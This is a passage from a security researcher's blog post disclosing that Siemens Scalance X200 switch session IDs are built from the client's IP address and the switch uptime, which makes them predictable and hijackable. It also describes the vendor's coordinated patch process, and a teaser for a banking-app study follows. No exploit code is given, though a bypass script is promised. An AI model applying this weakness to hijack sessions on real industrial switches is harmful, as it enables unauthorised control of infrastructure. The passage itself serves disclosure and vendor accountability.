It was during discussions with my esteemed colleague Reid Wightman, he suggested it was an IP address. He pointed out the C0 and A8 are 192 168 in decimal. So I went and checked the IP address of the switch I have, and it was not 192.168.0.97. So again I was stumped until I realized it was the IP address of my own client machine!
 
In other words, the nonceA was simply the address of the web client (converted to hex) connecting to the switch, concatenated to the uptime of the switch (in hex). I can practically see the developer who thought this would be a good idea. I can hear them thinking that each session is clearly distinguished by the address it is connecting from, and made impossible to brute-force with time. Time+Space, that’s too large to brute-force or estimate right? You must admit, it has a kind of perverse logic to it. Unfortunately, it is highly predictable and insecure.
 
Go home Scalance X200 family session IDs, you’re drunk. Aside from being completely predictable, they are too small. 32 hex is a far cry from using the 128 bits recommended by OWASP.
 
I guess that’s what they refer to in this announcement with the phrases “A potential vulnerability” and “that might allow attackers to hijack web sessions over the network without authentication”. 
 
There are a few more vulnerabilities to discuss about this switch, but to learn about those, you’ll have to see me at S4x14, or wait for the next blog post where I release a more reliable POC.
 
Usually I am one to organise a nice quiet coordinated disclosure, probably over a lavender scone and a cup of tea. I do my best to be polite, cheerful, and helpful, though I am under no obligation to do so, and there are considerable financial incentives for a researcher to never report a vulnerability at all
 
Siemens product CERT should be commended for being polite and helpful, and relatively quick with this fix. They acknowledged my work, and communicated clear timelines of when to expect a fix. This is precisely how they should go about communicating with us in the research community. It was at this point that I informed the good folks over at Siemens that I would verify the patch on Sep 12th. On the morning of the 12th, I tried to login to verify they patch they had provided, and found myself blocked from doing so. 
 
 
Should a firmware release with security implications only be downloadable in a forum that requires vetting and manual processing? Is it acceptable to end users that security patches are under export restriction?
 
Luckily these bans were lifted later that day and I was able to confirm the fixes. I would like to commend Siemens Product CERT the team for fixing these issues rapidly and with great professionalism. They communicated with me securely using GPG encrypted emails, set realistic timelines, and gave me feedback when those timelines didn’t work out. This leads me to a formal challenge based on their performance.
 
I challenge any other ICS vendors to match Siemens laudable response times and produce patches within 3 months for any externally submitted security vulnerabilities.
 
Stay tuned for part 2 where we release the simple Python script for authentication bypass which allows firmware and configuration upload and download.
 
*If you can crack this, and are interested in a job, please send IOActive your CV and the cleartext password used to create that credential. It is not hard, but it might take you a while….
INSIGHTS | January 8, 2014

Personal banking apps leak info through phone

For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results. The goal was to perform a black box and static analysis of worldwide mobile home banking apps. The research used iPhone/iPad devices to test a total of 40 home banking apps from the top 60 most influential banks in the world.

(more…)